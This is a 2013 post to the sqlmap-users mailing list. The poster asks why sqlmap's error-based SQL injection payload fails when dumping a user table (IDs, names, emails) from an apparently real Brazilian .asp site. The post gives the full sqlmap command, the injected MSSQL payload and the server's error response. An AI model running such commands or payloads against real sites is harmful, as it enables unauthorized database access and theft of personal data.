[sqlmap-users] payload problem? "Incorrect syntax near"
Brought to you by:
inquisb
Menu
▾
▴
[sqlmap-users] payload problem? "Incorrect syntax near"
|
From: Vinicius Da L. <vin...@gm...> - 2013-11-12 13:14:07
|
Hello, List db ok, list tables and columns OK, but when I try dump contents, got 'Incorrect syntax' error in html response, so I suspect that something is wrong about the payload sent by sqlmap: ./sqlmap.py -u "http://www.[snip].br/noticias/[snip].asp?ID=4416" --random-agent --threads=1 --technique=E -D 057 -T Cadastro -C CAD_ID,CAD_Nome,CAD_Email --dump -v 6 [PAYLOAD] 4416 AND 9709=CONVERT(INT,(SELECT CHAR(113)+CHAR(119)+CHAR(122)+CHAR(114)+CHAR(113)+(SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM 057.dbo.Cadastro)+CHAR(113)+CHAR(115)+CHAR(117)+CHAR(119)+CHAR(113))) [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 2 times HTML RESPONSE: <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Line 1: Incorrect syntax near '057.'.</font> Any clue? Thanks! |
